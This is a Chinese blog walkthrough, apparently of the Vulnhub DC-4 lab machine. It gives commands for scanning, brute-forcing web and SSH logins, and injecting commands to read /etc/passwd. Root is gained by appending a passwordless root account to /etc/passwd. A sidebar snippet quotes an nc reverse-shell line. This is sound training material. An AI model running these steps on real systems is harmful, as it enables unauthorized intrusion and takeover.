Vulnhub-DC-4

最新推荐文章于 2023-01-28 18:25:03 发布
最新推荐文章于 2023-01-28 18:25:03 发布
阅读量307 收藏
点赞数
分类专栏: Vulnhub 文章标签: DC
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107120572
版权

扫描获取目标 IP 地址:192.168.67.135
nmap -sn 192.168.67.0/24

扫描目标,获取系统信息和开放端口:80 && 22
nmap -A -p- 192.168.67.135
(初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路)

登陆 http://192.168.67.135 :
首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用
页面上写着:Admin Information Systems Login,说是以系统用户登录
再看看发现 POST 表单,试了下弱口令,不解,故拿出 Burpsuite 看看能否破解密码
浏览器设置好代理,抓请求然后burpsuite调至intruder,
拷贝一份字典到主目录下,方便 burpsuite 使用字典,在 intruder 下加载 payload ,start attack爆破即可
cp /usr/share/wordlists/nmap.lst /root/

等待一段时间,得到密码为 happy [通过 length 不同即可看出密码],登陆进去看看
发现一个 command 链接,点进去挑选了个 List Files 可看到熟悉的东西:


total 24
-rw-r–r-- 1 root root 1783 Apr 5 2019 command.php
drwxr-xr-x 2 root root 4096 Mar 24 2019 css
drwxr-xr-x 2 root root 4096 Mar 24 2019 images
-rw-r–r-- 1 root root 506 Apr 6 2019 index.php
-rw-r–r-- 1 root root 1473 Apr 7 2019 login.php
-rw-r–r-- 1 root root 663 Mar 24 2019 logout.php

`cat+/etc/passwd` 这不就是 linux 下经常使用的 ls 命令么...所以,抓下来看看能不能修修改改再发过去? --- send to repeater 通过修改我们可以 cat /ect/passwd 下有四个账户:root / sam / jim / charles 最初的猜想验证了,很可能就是 ssh 登陆进去... 到各个 /home/ 下看看有没有特别东西 `ls+la+/home/sam`:没啥东西 `ls+la+/home/jim`:发现只有一 backups目录和一 test.sh文件可查 `cat+test.sh`:没啥特别的,几行字 `ls+/home/jim/backups`:看看backups目录下都有啥,发现哟一个oldpassword文件,这...又是要爆破密码么...(果然) `cat+/home/jim/backups/old-passwords.bak`:将得到的密码复制一份到 kali的/root/oldpwd.txt 中 `vim oldpwd.txt`

使用美杜莎爆破,得到密码 jibril04
medusa -M ssh -u jim -h 192.168.67.135 -P oldpwd.txt

ssh登陆上去:ssh jim@192.168.67.135
打开刚才无权限打开的mbox,原来是封邮件,并且得到版本信息:Exim 4.89
所以search一波有没有可以直接提权的:searchsploit Exim Local Privilege

发现确实有该版本的:Exim 4.87 - 4.91 - Local Privilege Escal | linux/local/46996.sh

于是乎:scp 46996.sh jim@192.168.67.135:/home/jim/传过去
bash 46996.sh执行,报错…
漏洞利用不成功…

到 /var/mail 目录下看看还有无有其它邮件:cd /var/www
发现一封:


Hi Jim,

I’m heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

哦吼,直接送上密码
既然是 boss 要给的,那是不是 charles 的权限要大点?
ssh charles@192.168.67.135
ls

木有发现什么东西,不过直觉上到这一步应该就是要提权了的。怎么提?这是个好问题那就看看自己有什么 sudo 权限:sudo -l

开心的事情是:发现一个具有 sudo 权限的:/usr/bin/teehee,但是并不知道要怎么使用,查看一下帮助文档
/usr/bin/teehee --help

原来通过该命令(前提是拥有绝对的权限)可以在任意文件后边添加内容那为什么不伪造另一个 root(到这里,我仿佛听到了邪恶的笑声…)
echo "haha::0:0:root:/root:/bin/bash" | sudo /usr/bin/teehee -a /etc/passwd
su haha
cd /root
ls
cat flag.txt

Congratulations!!!

总结:
1.密码破解2.漏洞利用3.提权增添虚假root账号

CrAcKeR-1
关注
专栏目录
VulnHubDC-4
weixin_39219503的博客
01-31 295
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下,只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 2995
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 488
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现有执行命令的地方 抓包发现命令由post包传过去 执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
Vulnhub DC-4
柠檬木有枝
07-14 259
Nmap 扫描主机,nmap -sS 192.168.6.0/24 访问服务是一个登陆页面,使用 burp 爆破用户名为 admin,密码为 happy /home/jim/backups 下发现 old-passwords.bak 读取一下 使用 hydra 爆破 ssh:hydra -l jim -P password.txt 192.168.6.130 ssh 用户名:jim,密码:...
vulnhub-dc4
bqnagus
10-05 1198
vulnhub-dc4靶机复现
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1699
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1992
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
靶机实操:vulnhub-DC3
不想当脚本小子的脚本小子
12-06 197
今天继续趁着回家来用DC练练手。照旧先是扫一下内网主机,我一般喜欢先找一下存活的主机然后再查看具体的信息,扫描到IP为192.168.249.135。只开放了80端口 访问网页长这样:发现有一个右下角forget操作,一会看看这里有没有可以操作的地方。CMS是Joomla,中间件会不会存在漏洞? 接下来常规操作。查看robots没东西,那再扫扫后台,挑几个觉得有用的打开看看。总觉得最终的落脚点会在刚才的忘记用户名和密码那里,一会看看会不会被打脸哈哈哈哈 登录界面先简单sql..
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub DC: 4
spider的博客
12-01 255
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 459
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
[Vulnhub] DC-4
最新发布
weixin_63231007的博客
01-28 914
DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)
[VulnHub]DC-4
cosmoslin的博客
09-07 151
VulnHub——DC-4渗透测试过程记录 测试人员:cosmos 目标地址:192.168.131.130 目标账号:未知 目标主机:未知 信息搜集 1.netdiscover netdiscover -r 192.168.131.0/24 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.130 3.nmap nmap -A 192.168.131.130 网站测试 进入网站 发现需要登录,提示admin登录,猜测用户名
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1183
vulnhubdc-4详细步骤
vulnhub靶场,DC-4
kukudeshuo的博客
07-12 329
vulnhub靶场,DC-4 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-4(192.168.58.147) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.147 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机的80端口 就是一个登入页面,不知道账号密码,所以没有多大用处 网站目录扫描
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1807
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub靶场渗透-DC-4
paidx0
10-21 273
前言 靶机IP(192.168.110.134) 攻击机IP(192.168.110.127) 网络NAT模式 信息收集 访问80端口,提示以admin的用户名登录 直接爆破了,爆破结果是 admin:happy 漏洞利用 登录进去发现是个可以RCE的 思路是不是来了,很显然直接弹shell了 怎么弹shell就不多说了,我的靶场笔记很多都有写 存在三个用户 进入jim的backups文件夹发现了很多的旧密码,思路这不就又来了 开放ssh服务,很显然是要我们去爆破了 拿到jim的账号了,登
vulnhub 入门DC-4
weixin_52780973的博客
01-01 233
vulnhub 实战靶机 linux teehee提权 hydra爆破登录框 ssh连接收到mail
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值